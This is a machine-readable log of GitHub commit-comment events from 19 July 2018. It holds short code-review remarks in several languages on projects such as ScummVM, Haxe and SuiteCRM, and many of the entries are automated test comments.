{"id":"7987892550","type":"CommitCommentEvent","actor":{"login":"MrJackC"},"repo":{"name":"MrJackC/Algorithms"},"payload":{"comment":{"id":29761448,"position":null,"line":null,"path":null,"commit_id":"8080b44a0aad8df3c7fa3aa9ddf90e6bcdb76cff","created_at":"2018-07-19T09:16:11Z","updated_at":"2018-07-19T09:16:11Z","author_association":"OWNER","body":"收到"}},"created_at":"2018-07-19T09:16:11Z"}
{"id":"7987894139","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29761452,"position":520,"line":2049,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-19T09:16:27Z","updated_at":"2018-07-19T09:16:27Z","author_association":"OWNER","body":"Surement, mais c'est pas evident a tester !"}},"created_at":"2018-07-19T09:16:27Z"}
{"id":"7987894833","type":"CommitCommentEvent","actor":{"login":"sakshisamant"},"repo":{"name":"sakshisamant/Practice_Project"},"payload":{"comment":{"id":29761453,"position":null,"line":null,"path":null,"commit_id":"870e2d42d4eaf52a8ed7a4ed4e117d72c3645d45","created_at":"2018-07-19T09:16:34Z","updated_at":"2018-07-19T09:16:34Z","author_association":"OWNER","body":"Good job"}},"created_at":"2018-07-19T09:16:34Z"}
{"id":"7987895839","type":"CommitCommentEvent","actor":{"login":"ryangribble-test2"},"repo":{"name":"ryangribble-test2/CommitCommentsReactionTests-20180719091642504-20180719091642504"},"payload":{"comment":{"id":29761458,"position":null,"line":null,"path":null,"commit_id":"de606ee2dc0c6e7c7ed80ec7b94fb5aacfe79f18","created_at":"2018-07-19T09:16:45Z","updated_at":"2018-07-19T09:16:45Z","author_association":"OWNER","body":"A test comment"}},"created_at":"2018-07-19T09:16:45Z"}
{"id":"7987897081","type":"CommitCommentEvent","actor":{"login":"ryangribble-test2"},"repo":{"name":"ryangribble-test2/CommitCommentsReactionTests-20180719091656127-20180719091656127"},"payload":{"comment":{"id":29761461,"position":null,"line":null,"path":null,"commit_id":"a40231e4a58858b70242c884236cac0c851cd6ce","created_at":"2018-07-19T09:16:59Z","updated_at":"2018-07-19T09:16:59Z","author_association":"OWNER","body":"A test comment"}},"created_at":"2018-07-19T09:16:59Z"}
{"id":"7987897234","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":29761463,"position":25,"line":161,"path":"engines/pink/pink.cpp","commit_id":"a053a19ca258dc4d344bc2345b5faa1bf2b0183e","created_at":"2018-07-19T09:17:00Z","updated_at":"2018-07-19T09:17:00Z","author_association":"MEMBER","body":"It makes no sense to put this function to the class. Rather make it static (e.g. local to the file), and without any class. Then you will not need to have static class member in pink.h"}},"created_at":"2018-07-19T09:17:00Z"}
{"id":"7987897548","type":"CommitCommentEvent","actor":{"login":"ryangribble-test2"},"repo":{"name":"ryangribble-test2/CommitCommentsReactionTests-20180719091656127-20180719091656127"},"payload":{"comment":{"id":29761465,"position":null,"line":null,"path":null,"commit_id":"a4aad19482df2ef5f98a444ccc79222e16d67911","created_at":"2018-07-19T09:17:04Z","updated_at":"2018-07-19T09:17:04Z","author_association":"OWNER","body":"A test comment"}},"created_at":"2018-07-19T09:17:04Z"}
{"id":"7987899955","type":"CommitCommentEvent","actor":{"login":"ryangribble-test2"},"repo":{"name":"ryangribble-test2/CommitCommentsReactionTests-20180719091725511-20180719091725511"},"payload":{"comment":{"id":29761471,"position":null,"line":null,"path":null,"commit_id":"8a85f3af08672b5244660e0f7fcf9099bba7c7e1","created_at":"2018-07-19T09:17:28Z","updated_at":"2018-07-19T09:17:28Z","author_association":"OWNER","body":"A test comment"}},"created_at":"2018-07-19T09:17:28Z"}
{"id":"7987900024","type":"CommitCommentEvent","actor":{"login":"GovindKalyanaMOJ"},"repo":{"name":"Pareis2/PareisPractise"},"payload":{"comment":{"id":29761472,"position":null,"line":null,"path":null,"commit_id":"0c8b6a1c796fba09daa0973680aad82bf9d9f250","created_at":"2018-07-19T09:17:29Z","updated_at":"2018-07-19T09:17:29Z","author_association":"COLLABORATOR","body":"Start with Junits."}},"created_at":"2018-07-19T09:17:29Z"}
{"id":"7987900253","type":"CommitCommentEvent","actor":{"login":"ryangribble-test2"},"repo":{"name":"ryangribble-test2/CommitCommentsReactionTests-20180719091725511-20180719091725511"},"payload":{"comment":{"id":29761473,"position":null,"line":null,"path":null,"commit_id":"8a85f3af08672b5244660e0f7fcf9099bba7c7e1","created_at":"2018-07-19T09:17:31Z","updated_at":"2018-07-19T09:17:31Z","author_association":"OWNER","body":"A test comment"}},"created_at":"2018-07-19T09:17:31Z"}
{"id":"7987901551","type":"CommitCommentEvent","actor":{"login":"ryangribble-test2"},"repo":{"name":"ryangribble-test2/public-repo-20180719091744179"},"payload":{"comment":{"id":29761480,"position":null,"line":null,"path":null,"commit_id":"7660166693ceeeacbac3670407680bc268e8bc37","created_at":"2018-07-19T09:17:46Z","updated_at":"2018-07-19T09:17:46Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-19T09:17:46Z"}
{"id":"7987901748","type":"CommitCommentEvent","actor":{"login":"saidmakh"},"repo":{"name":"saidmakh/Education"},"payload":{"comment":{"id":29761481,"position":7,"line":7,"path":"lesson 5/lesson5.js","commit_id":"ce271727f185017688e599b8794f1d4be00b3ddb","created_at":"2018-07-19T09:17:48Z","updated_at":"2018-07-19T09:17:48Z","author_association":"OWNER","body":"What??"}},"created_at":"2018-07-19T09:17:48Z"}
{"id":"7987902015","type":"CommitCommentEvent","actor":{"login":"ryangribble-test2"},"repo":{"name":"ryangribble-test2/public-repo-20180719091748922"},"payload":{"comment":{"id":29761484,"position":null,"line":null,"path":null,"commit_id":"d929785d35afa87e28af241414ca6126c6c75ec3","created_at":"2018-07-19T09:17:51Z","updated_at":"2018-07-19T09:17:51Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-19T09:17:51Z"}
{"id":"7987902473","type":"CommitCommentEvent","actor":{"login":"ryangribble-test2"},"repo":{"name":"ryangribble-test2/public-repo-20180719091753913"},"payload":{"comment":{"id":29761485,"position":null,"line":null,"path":null,"commit_id":"36827759a2c66a37b86eeec884c87b8638227c83","created_at":"2018-07-19T09:17:55Z","updated_at":"2018-07-19T09:17:55Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-19T09:17:55Z"}
{"id":"7987903086","type":"CommitCommentEvent","actor":{"login":"ryangribble-test2"},"repo":{"name":"ryangribble-test2/public-repo-20180719091800833"},"payload":{"comment":{"id":29761486,"position":null,"line":null,"path":null,"commit_id":"688aa6ba960a2a5bf2870da01a81eff51743df08","created_at":"2018-07-19T09:18:03Z","updated_at":"2018-07-19T09:18:03Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-19T09:18:03Z"}
{"id":"7987903409","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":29761487,"position":5,"line":165,"path":"engines/pink/pink.cpp","commit_id":"32a0e69045e952635c1525fc6929817c4d81c397","created_at":"2018-07-19T09:18:06Z","updated_at":"2018-07-19T09:18:06Z","author_association":"MEMBER","body":"Alternative would be to have WM restoring the screen."}},"created_at":"2018-07-19T09:18:06Z"}
{"id":"7987903626","type":"CommitCommentEvent","actor":{"login":"ryangribble-test2"},"repo":{"name":"ryangribble-test2/public-repo-20180719091806747"},"payload":{"comment":{"id":29761490,"position":null,"line":null,"path":null,"commit_id":"23269bb9b28fad98af624879bbe00c6e02c778a2","created_at":"2018-07-19T09:18:08Z","updated_at":"2018-07-19T09:18:08Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-19T09:18:08Z"}
{"id":"7987905138","type":"CommitCommentEvent","actor":{"login":"ryangribble-test2"},"repo":{"name":"ryangribble-test2/public-repo-20180719091822426"},"payload":{"comment":{"id":29761491,"position":null,"line":null,"path":null,"commit_id":"a4b230755812d4c01494d1e718a529d924fe9d5a","created_at":"2018-07-19T09:18:24Z","updated_at":"2018-07-19T09:18:24Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-19T09:18:24Z"}
{"id":"7987905606","type":"CommitCommentEvent","actor":{"login":"ryangribble-test2"},"repo":{"name":"ryangribble-test2/public-repo-20180719091827712"},"payload":{"comment":{"id":29761492,"position":null,"line":null,"path":null,"commit_id":"114e844ec76f250c550f4f2c8b25679582b2c2d6","created_at":"2018-07-19T09:18:29Z","updated_at":"2018-07-19T09:18:29Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-19T09:18:29Z"}
{"id":"7987906356","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29761496,"position":22,"line":22,"path":"Lesson1/right_triangle.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T09:18:37Z","updated_at":"2018-07-19T09:18:37Z","author_association":"NONE","body":"второй ответ в гугле по запросу \"sublime настроить автодобавление пустой строки в конце файла\"\r\nhttps://cifronomika.ru/blog/git-no-newline-at-end-of-file.html"}},"created_at":"2018-07-19T09:18:37Z"}
{"id":"7987911018","type":"CommitCommentEvent","actor":{"login":"jusabatier"},"repo":{"name":"georchestra/geonetwork"},"payload":{"comment":{"id":29761499,"position":null,"line":null,"path":null,"commit_id":"33ce9791bb2e1aa2539de2d378df9b0602c667aa","created_at":"2018-07-19T09:19:30Z","updated_at":"2018-07-19T09:19:30Z","author_association":"NONE","body":"Still have `Error: this.getLayerJSONSpec is not a function` on click."}},"created_at":"2018-07-19T09:19:30Z"}
{"id":"7987913231","type":"CommitCommentEvent","actor":{"login":"kallewoof"},"repo":{"name":"kallewoof/elements"},"payload":{"comment":{"id":29761503,"position":6,"line":157,"path":"src/chainparams.cpp","commit_id":"b1fcfa341e5b45321169a89ee0694dabd245afca","created_at":"2018-07-19T09:19:55Z","updated_at":"2018-07-19T09:19:55Z","author_association":"OWNER","body":"This assert looks weird to me. Is it supposed to throw here or not? Is this ok if initialFreeCoins is 0? I would suggest just doing\r\n```C++\r\nif (!anyonecanspend_aremine && initialFreeCoins != 0)` {\r\n  assert(...)\r\n}\r\n```\r\n"}},"created_at":"2018-07-19T09:19:55Z"}
{"id":"7987913293","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":29761504,"position":null,"line":null,"path":null,"commit_id":"45d662c735dc3c6d371f3e3f22733eb9a47ed5d9","created_at":"2018-07-19T09:19:55Z","updated_at":"2018-07-19T09:19:55Z","author_association":"MEMBER","body":"We would need `TypeHint` if we wanted to have NotJsonType in there, but I don't really see a reason why we would need that."}},"created_at":"2018-07-19T09:19:55Z"}
{"id":"7987913429","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29761506,"position":11,"line":7,"path":"Lesson1/the_weight.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T09:19:57Z","updated_at":"2018-07-19T09:19:57Z","author_association":"NONE","body":"Английский поможет увидеть эту структуру быстрее."}},"created_at":"2018-07-19T09:19:57Z"}
{"id":"7987916721","type":"CommitCommentEvent","actor":{"login":"pgorod"},"repo":{"name":"salesagility/SuiteCRM"},"payload":{"comment":{"id":29761514,"position":null,"line":null,"path":null,"commit_id":"936018bc43b572b7a396a2286bdd4c24294aa4a4","created_at":"2018-07-19T09:20:31Z","updated_at":"2018-07-19T09:20:31Z","author_association":"CONTRIBUTOR","body":"@PedroErnst this comment seems to indicate there could be a bug in this commit, can you please review?\r\nhttps://github.com/salesagility/SuiteCRM/issues/5852#issuecomment-406207546\r\nThanks!"}},"created_at":"2018-07-19T09:20:31Z"}
{"id":"7987920172","type":"CommitCommentEvent","actor":{"login":"Ellerden"},"repo":{"name":"Ellerden/railway_station"},"payload":{"comment":{"id":29761529,"position":7,"line":15,"path":"lib/station.rb","commit_id":"54e71dc558f100edaa1b556ed7a491de86cebecc","created_at":"2018-07-19T09:21:09Z","updated_at":"2018-07-19T09:21:09Z","author_association":"OWNER","body":"Да, именно это с select я и хотела сделать. Спасибо! "}},"created_at":"2018-07-19T09:21:09Z"}
{"id":"7987920836","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29761535,"position":17,"line":13,"path":"Lesson1/the_weight.rb","commit_id":"9cde866269fb0ed380c5e534e7cc48e6e7153318","created_at":"2018-07-19T09:21:16Z","updated_at":"2018-07-19T09:21:16Z","author_association":"NONE","body":"Тут не буду спорить. Думаю стоит просто воспринять это аздание, как базовое упражнение на написание условий"}},"created_at":"2018-07-19T09:21:16Z"}
{"id":"7987920957","type":"CommitCommentEvent","actor":{"login":"VitaliyLazebny"},"repo":{"name":"VitaliyLazebny/thinknetica1"},"payload":{"comment":{"id":29761536,"position":26,"line":26,"path":"lesson1/optimal_weight.rb","commit_id":"53df4e000e3331f345f6e574886491558ad711cb","created_at":"2018-07-19T09:21:17Z","updated_at":"2018-07-19T09:21:17Z","author_association":"OWNER","body":"так... что-то я по поводу пустых строк в конце файла упустил.\r\nЭто какой-то кодстайл? зачем она там? откуда такое правило?"}},"created_at":"2018-07-19T09:21:17Z"}
{"id":"7987923441","type":"CommitCommentEvent","actor":{"login":"Ellerden"},"repo":{"name":"Ellerden/railway_station"},"payload":{"comment":{"id":29761543,"position":20,"line":24,"path":"lib/station.rb","commit_id":"54e71dc558f100edaa1b556ed7a491de86cebecc","created_at":"2018-07-19T09:21:43Z","updated_at":"2018-07-19T09:21:43Z","author_association":"OWNER","body":"Спасибо, сделаю с return"}},"created_at":"2018-07-19T09:21:43Z"}
{"id":"7987924664","type":"CommitCommentEvent","actor":{"login":"rild"},"repo":{"name":"JunJun0128/SpiceKigen"},"payload":{"comment":{"id":29761547,"position":23,"line":64,"path":"app/src/main/java/com/lifeistech/android/schoolseventeen/junjun/spicekigen/MemoActivity.java","commit_id":"5b74e9d5e765e0d5873b1a799c23efe3bdb4b980","created_at":"2018-07-19T09:21:57Z","updated_at":"2018-07-19T09:21:57Z","author_association":"NONE","body":"この場合、`titleId` は絶対に null にならない"}},"created_at":"2018-07-19T09:21:57Z"}
{"id":"7987929311","type":"CommitCommentEvent","actor":{"login":"rild"},"repo":{"name":"JunJun0128/SpiceKigen"},"payload":{"comment":{"id":29761557,"position":23,"line":64,"path":"app/src/main/java/com/lifeistech/android/schoolseventeen/junjun/spicekigen/MemoActivity.java","commit_id":"5b74e9d5e765e0d5873b1a799c23efe3bdb4b980","created_at":"2018-07-19T09:22:48Z","updated_at":"2018-07-19T09:22:48Z","author_association":"NONE","body":"titleId には\r\n- 値がある場合はその値が入る : 例えば \"sample title\"\r\n- 値がない場合は \"\" が入る\r\n\r\n\"\" と、null は別物"}},"created_at":"2018-07-19T09:22:48Z"}
{"id":"7987929560","type":"CommitCommentEvent","actor":{"login":"VitaliyLazebny"},"repo":{"name":"VitaliyLazebny/thinknetica1"},"payload":{"comment":{"id":29761559,"position":47,"line":47,"path":"lesson1/pifagor_1.rb","commit_id":"53df4e000e3331f345f6e574886491558ad711cb","created_at":"2018-07-19T09:22:50Z","updated_at":"2018-07-19T09:22:50Z","author_association":"OWNER","body":"Ну почему же. Понятно. Потому что я сам себе решил что стороны будут целочисленными."}},"created_at":"2018-07-19T09:22:50Z"}
{"id":"7987931360","type":"CommitCommentEvent","actor":{"login":"microsoftBoy"},"repo":{"name":"microsoftBoy/common"},"payload":{"comment":{"id":29761562,"position":null,"line":null,"path":null,"commit_id":"696986590be719ea1c87b7b06c336f7c29a30e71","created_at":"2018-07-19T09:23:11Z","updated_at":"2018-07-19T09:23:11Z","author_association":"OWNER","body":"。。。"}},"created_at":"2018-07-19T09:23:11Z"}
{"id":"7987931608","type":"CommitCommentEvent","actor":{"login":"hucvicse"},"repo":{"name":"hucvicse/hutao.github.io"},"payload":{"comment":{"id":29761565,"position":3,"line":1,"path":"README.md","commit_id":"b8eee5cc3032f9a12fd18a61e7d125054a1c018a","created_at":"2018-07-19T09:23:14Z","updated_at":"2018-07-19T09:23:14Z","author_association":"OWNER","body":"##GitHub页面汉化参考文档链接：\r\nhttps://blog.csdn.net/qq_27840695/article/details/78551092"}},"created_at":"2018-07-19T09:23:14Z"}
{"id":"7987931961","type":"CommitCommentEvent","actor":{"login":"ChrisTerBeke"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":29761567,"position":null,"line":null,"path":null,"commit_id":"75e873cc9ed88071ee035acccd6e87a3758040a3","created_at":"2018-07-19T09:23:17Z","updated_at":"2018-07-19T09:23:17Z","author_association":"MEMBER","body":"My OO senses are tingling :smile: "}},"created_at":"2018-07-19T09:23:17Z"}
{"id":"7987938068","type":"CommitCommentEvent","actor":{"login":"browncrane"},"repo":{"name":"kochedykov/jlibmodbus"},"payload":{"comment":{"id":29761591,"position":107,"line":107,"path":"examples/com/invertor/examples/modbus/SimpleSlaveTCP.java","commit_id":"9bc4059167a9877834993d483a1073f40f0fa3a3","created_at":"2018-07-19T09:24:27Z","updated_at":"2018-07-19T09:24:27Z","author_association":"CONTRIBUTOR","body":"Using `CountDownLatch` and make it work for me,  but that may need to change the `ModbusSlave`. Would you like to review the \"MVP\" before pull request?"}},"created_at":"2018-07-19T09:24:27Z"}
{"id":"7987940083","type":"CommitCommentEvent","actor":{"login":"joanliu"},"repo":{"name":"ivolo/disposable-email-domains"},"payload":{"comment":{"id":29761593,"position":null,"line":null,"path":null,"commit_id":"19ac1552f0dbd65a75816cbe7e8e3c93f9be8a29","created_at":"2018-07-19T09:24:47Z","updated_at":"2018-07-19T09:24:47Z","author_association":"CONTRIBUTOR","body":"I copied-pasted from the website/the sign up attempt. At first I thought it\nwas an i, but github made it very clear it was an L. A quick Google search\nmay ease your mind. That being said, ironore.com may be another disposable\nemail that needs to be added, but not the one I checked.\n\nOn Thu, Jul 19, 2018, 2:11 AM Victor <notifications@github.com> wrote:\n\n> @joanliu <https://github.com/joanliu> also I think we should double check\n> the zero (0) and o (O) letter. I think it's IronOre with an O not a 0.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ivolo/disposable-email-domains/commit/19ac1552f0dbd65a75816cbe7e8e3c93f9be8a29#commitcomment-29759550>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADmC9dPnmZ4NfFYxqtXzet9XTQdVogPrks5uICL9gaJpZM4VVzZS>\n> .\n>\n"}},"created_at":"2018-07-19T09:24:47Z"}
{"id":"7987972428","type":"CommitCommentEvent","actor":{"login":"abo-abo"},"repo":{"name":"abo-abo/swiper"},"payload":{"comment":{"id":29761681,"position":null,"line":null,"path":null,"commit_id":"d1d567ac6fb70b88342d9db4db2b2d4f89c10e29","created_at":"2018-07-19T09:30:35Z","updated_at":"2018-07-19T09:30:35Z","author_association":"OWNER","body":"My Emacs version is\r\n\r\n    GNU Emacs 26.1 (build 1, x86_64-pc-linux-gnu, GTK+ Version 3.18.9) of 2018-06-19\r\n"}},"created_at":"2018-07-19T09:30:35Z"}
{"id":"7987976340","type":"CommitCommentEvent","actor":{"login":"che11"},"repo":{"name":"thinnect/tos-platforms"},"payload":{"comment":{"id":29761690,"position":null,"line":null,"path":null,"commit_id":"8ed7e5f6c976c0ce5c742206374aa091a435d31a","created_at":"2018-07-19T09:31:18Z","updated_at":"2018-07-19T09:31:18Z","author_association":"NONE","body":"thanks for the tip. I also work with rfr2 and have a bug during vdd measurement: after the measurement mcu does not go to sleep (adc is not turned off). I will test your version, thanks!"}},"created_at":"2018-07-19T09:31:18Z"}
{"id":"7987980446","type":"CommitCommentEvent","actor":{"login":"ataweg"},"repo":{"name":"espressif/ESP8266_NONOS_SDK"},"payload":{"comment":{"id":29761708,"position":null,"line":null,"path":null,"commit_id":"c76613457be934856bc3bcfce7117eb00300e020","created_at":"2018-07-19T09:32:02Z","updated_at":"2018-07-19T09:32:02Z","author_association":"NONE","body":"Is the new exception handler compatible with the gdbstup? I have seen some SIGSEGV debugging with gdb and gdbstub that make me doubt it. \r\nPlease make debugging with gdb and gdbstub work again.\r\nViele Gruesse\r\nAxel"}},"created_at":"2018-07-19T09:32:02Z"}
{"id":"7987980883","type":"CommitCommentEvent","actor":{"login":"ataweg"},"repo":{"name":"espressif/ESP8266_NONOS_SDK"},"payload":{"comment":{"id":29761710,"position":null,"line":null,"path":null,"commit_id":"c76613457be934856bc3bcfce7117eb00300e020","created_at":"2018-07-19T09:32:07Z","updated_at":"2018-07-19T09:32:07Z","author_association":"NONE","body":"Is the new exception handler compatible with the gdbstup? I have seen some SIGSEGV debugging with gdb and gdbstub that make me doubt it. \r\nPlease make debugging with gdb and gdbstub work again.\r\nViele Gruesse\r\nAxel"}},"created_at":"2018-07-19T09:32:07Z"}
{"id":"7987984868","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29761719,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-19T09:32:49Z","updated_at":"2018-07-19T09:32:49Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-19T09:32:49Z"}
{"id":"7987991628","type":"CommitCommentEvent","actor":{"login":"VitaliyLazebny"},"repo":{"name":"VitaliyLazebny/thinknetica1"},"payload":{"comment":{"id":29761736,"position":43,"line":43,"path":"lesson1/quadratic_1.rb","commit_id":"53df4e000e3331f345f6e574886491558ad711cb","created_at":"2018-07-19T09:34:02Z","updated_at":"2018-07-19T09:34:02Z","author_association":"OWNER","body":"ага... правлю."}},"created_at":"2018-07-19T09:34:02Z"}
{"id":"7987992039","type":"CommitCommentEvent","actor":{"login":"YTZzzzz"},"repo":{"name":"YTZzzzz/Barra_CNE5"},"payload":{"comment":{"id":29761739,"position":null,"line":null,"path":null,"commit_id":"8ff55e655896c1df53b60289a480ab18e6f9b161","created_at":"2018-07-19T09:34:07Z","updated_at":"2018-07-19T09:34:07Z","author_association":"OWNER","body":"Extract data by Wind API"}},"created_at":"2018-07-19T09:34:07Z"}
{"id":"7987995899","type":"CommitCommentEvent","actor":{"login":"js1688"},"repo":{"name":"js1688/cat"},"payload":{"comment":{"id":29761747,"position":null,"line":null,"path":null,"commit_id":"f5ac5b0579fc7144ff59ab405ed19a88f93f7759","created_at":"2018-07-19T09:34:49Z","updated_at":"2018-07-19T09:34:49Z","author_association":"OWNER","body":"111"}},"created_at":"2018-07-19T09:34:49Z"}
{"id":"7988000578","type":"CommitCommentEvent","actor":{"login":"MrJons"},"repo":{"name":"AVADOLearning/moodle"},"payload":{"comment":{"id":29761754,"position":27,"line":45,"path":"mod/book/db/upgrade.php","commit_id":"5e4c13857432d36fc099297dff864ead8a363fb2","created_at":"2018-07-19T09:35:39Z","updated_at":"2018-07-19T09:35:39Z","author_association":"NONE","body":"Removed comments to clean up, can add them back in."}},"created_at":"2018-07-19T09:35:39Z"}
{"id":"7988000953","type":"CommitCommentEvent","actor":{"login":"sgururajshetty"},"repo":{"name":"apache/carbondata"},"payload":{"comment":{"id":29761755,"position":null,"line":null,"path":null,"commit_id":"71048d7b7d2e4aa4a06536b45f2a33a4542f8b76","created_at":"2018-07-19T09:35:43Z","updated_at":"2018-07-19T09:35:43Z","author_association":"CONTRIBUTOR","body":"LGTM"}},"created_at":"2018-07-19T09:35:43Z"}
{"id":"7988002244","type":"CommitCommentEvent","actor":{"login":"Dasc3er"},"repo":{"name":"devcode-it/openstamanager"},"payload":{"comment":{"id":29761760,"position":null,"line":null,"path":null,"commit_id":"1418a08b4d76b6c04d1152fe7226c476b756020b","created_at":"2018-07-19T09:35:57Z","updated_at":"2018-07-19T09:35:57Z","author_association":"CONTRIBUTOR","body":"@devcode-it/openstamanager Con questo commit ho introdotto anche il supporto automatico per i _DATE_FORMAT_ in MySQL attraverso i campi **|timestamp_format|**, **|date_format|** e **|time_format|**.\r\nIn questo modo è possibile inserire nei campi _search_inside_ di **zz_views** le query `DATE_FORMAT(data, |timestamp_format|)` come ulteriore miglioramento alle **Viste** (@lucasalva87)."}},"created_at":"2018-07-19T09:35:57Z"}
{"id":"7988003255","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29761764,"position":39,"line":39,"path":"lesson1/quadratic_equation.rb","commit_id":"df17da593b54221b38b06fd2102823b40c005985","created_at":"2018-07-19T09:36:09Z","updated_at":"2018-07-19T09:36:09Z","author_association":"NONE","body":"а если представить что дискриминант будет равен 0.0000001, то получится что корень один, это не верно, не так ли?"}},"created_at":"2018-07-19T09:36:09Z"}
{"id":"7988003944","type":"CommitCommentEvent","actor":{"login":"godmoves"},"repo":{"name":"godmoves/HappyGo"},"payload":{"comment":{"id":29761765,"position":null,"line":null,"path":null,"commit_id":"4577bbdbaed507294069d0e7499eb05c6726fa99","created_at":"2018-07-19T09:36:15Z","updated_at":"2018-07-19T09:36:15Z","author_association":"OWNER","body":"Another `elf` flag is added to the dist server code to avoid flag not defined error, but it is not a really good way to solve this problem. Maybe I will move this `elf` option into model configure file."}},"created_at":"2018-07-19T09:36:15Z"}
{"id":"7988009174","type":"CommitCommentEvent","actor":{"login":"kuanghuichun"},"repo":{"name":"hua1995116/webchat"},"payload":{"comment":{"id":29761773,"position":null,"line":null,"path":null,"commit_id":"fe571c3d17b1a7429ee4c6d328074cbf74d64806","created_at":"2018-07-19T09:37:12Z","updated_at":"2018-07-19T09:37:12Z","author_association":"NONE","body":"能加下你的QQ学习下吗"}},"created_at":"2018-07-19T09:37:12Z"}
{"id":"7988015178","type":"CommitCommentEvent","actor":{"login":"amyruth"},"repo":{"name":"amyruth/Project-3-Arcade-Game-Clone"},"payload":{"comment":{"id":29761783,"position":null,"line":null,"path":null,"commit_id":"6392797a3eac4143ae4a52ae7233923f7225f768","created_at":"2018-07-19T09:38:18Z","updated_at":"2018-07-19T09:38:18Z","author_association":"OWNER","body":"I noticed a situation where hits were registering if I was on the second stone row. The player was getting clipped by enemies in the row above. I knocked the range down and tested again and it seemed to clear up the issue. I hope I never have to mess with it again. We'll see."}},"created_at":"2018-07-19T09:38:18Z"}
{"id":"7988022224","type":"CommitCommentEvent","actor":{"login":"rhuss"},"repo":{"name":"rohanKanojia/fabric8-maven-plugin-rt"},"payload":{"comment":{"id":29761818,"position":1,"line":1,"path":".idea/.name","commit_id":"a816c5ce616ed537811cad55975ff345a0ad8b73","created_at":"2018-07-19T09:39:38Z","updated_at":"2018-07-19T09:39:38Z","author_association":"NONE","body":"wouldn't add `.idea` to GIT"}},"created_at":"2018-07-19T09:39:38Z"}
{"id":"7988025391","type":"CommitCommentEvent","actor":{"login":"gdelhumeau"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29761823,"position":67,"line":606,"path":"xwiki-platform-core/xwiki-platform-test/xwiki-platform-test-ui/src/main/java/org/xwiki/test/ui/XWikiWebDriver.java","commit_id":"4212e52f380b4d9d1ecf8c30eced5a5ab52210ea","created_at":"2018-07-19T09:40:13Z","updated_at":"2018-07-19T09:40:13Z","author_association":"MEMBER","body":"I have installed firefox 34 instead of firefox 35 and now it works."}},"created_at":"2018-07-19T09:40:13Z"}
{"id":"7988029531","type":"CommitCommentEvent","actor":{"login":"susajsnair"},"repo":{"name":"wkhtmltopdf/wkhtmltopdf"},"payload":{"comment":{"id":29761826,"position":null,"line":null,"path":null,"commit_id":"5dea2532977e5e9fbcb8da7aa3bd399b257096f4","created_at":"2018-07-19T09:41:01Z","updated_at":"2018-07-19T09:41:01Z","author_association":"NONE","body":"@ashkulz  could you explain me how to fix this issue. \r\nI have tried this but still has the issue\r\n`<tr style=\" page-break-inside: avoid !important;\">`\r\n"}},"created_at":"2018-07-19T09:41:01Z"}
{"id":"7988033640","type":"CommitCommentEvent","actor":{"login":"markheramis"},"repo":{"name":"ObeeWanKenobee/EasyDB"},"payload":{"comment":{"id":29761835,"position":26,"line":11,"path":"example/basic/2.tables/config.php","commit_id":"e3f16cdb4136c8c624be3faa1d908507b4c23809","created_at":"2018-07-19T09:41:47Z","updated_at":"2018-07-19T09:41:47Z","author_association":"NONE","body":"di tayo nito na style ma lito mga kids nito."}},"created_at":"2018-07-19T09:41:47Z"}
{"id":"7988036292","type":"CommitCommentEvent","actor":{"login":"yaocuiping"},"repo":{"name":"yaocuiping/Socket"},"payload":{"comment":{"id":29761839,"position":6,"line":6,"path":"Socket.c","commit_id":"65d1ba180e96dd34d1dfee12c6e06e8c63648a82","created_at":"2018-07-19T09:42:15Z","updated_at":"2018-07-19T09:42:15Z","author_association":"OWNER","body":"write与read头文件"}},"created_at":"2018-07-19T09:42:15Z"}
